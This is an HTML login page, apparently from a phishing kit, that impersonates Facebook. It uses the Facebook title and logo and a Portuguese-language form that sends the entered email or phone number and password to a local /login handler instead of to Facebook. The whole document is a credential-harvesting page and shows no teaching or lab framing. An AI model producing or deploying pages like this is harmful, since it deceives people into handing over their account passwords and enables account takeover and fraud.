<!DOCTYPE html>
<html>
<head>
    <title>Facebook</title>
    <link rel="stylesheet" href="/static/style.css">
</head>
<body>

<div class="container">

    <img src="https://upload.wikimedia.org/wikipedia/commons/5/51/Facebook_f_logo_%282019%29.svg" class="logo">

    <form action="/login" method="POST">
        <input type="text" name="user" placeholder="Email ou telefone">
        <input type="password" name="pass" placeholder="Palavra-passe">
        <button type="submit">Entrar</button>
    </form>

</div>

</body>
</html>
